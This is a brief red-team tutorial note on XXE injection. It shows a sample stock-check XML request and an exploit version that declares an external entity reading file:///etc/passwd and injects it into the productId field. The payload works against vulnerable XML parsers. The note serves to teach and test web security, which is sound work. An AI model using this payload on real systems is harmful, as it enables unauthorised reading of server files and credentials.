RedTeam
3.Web-Hacking
4.Injection
XXE
Commands
1.xxe Retrieve Files

Exploiting XXE to Retrieve Files

  • Need to modify submitted XML in two ways

    • Introduce (or edit) a DOCTYPE element that defines an external entity containing the path to a file.
    • Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.

  • Example -- shopping application checking for stock by submitting the following XML:

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId><
/stockCheck>
  • Exploit
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM
"file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></st
ockCheck>

Define an external entity (&xxe;) whose value is the contents of /etc/passwd and uses the entity within the productId value

Iis Xxe2.xxe Ssrf Attacks